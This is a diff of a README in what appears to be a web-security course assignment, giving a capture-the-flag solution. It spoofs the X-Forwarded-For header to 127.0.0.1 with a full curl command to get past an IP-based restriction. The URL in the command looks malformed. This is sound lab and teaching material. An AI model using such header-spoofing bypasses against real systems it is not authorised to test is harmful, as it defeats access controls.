allrounder27/Websec_Assignment/README.md

 ### Solution -

-So in this problem thw hint is that it only allows the ip 127.0.0.1.
+In this problem the hint is that it only allows the ip 127.0.0.1.
 So we copy the curl and use X-Forwarded-For, and use the command-

 ```$ curl -H 'X-Forwarded-For: 127.0.0.1' 'http://hack.bckdr.iindex.php' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H 'Accept-Language: en-US,en;q=0.9' --compressed --insecure```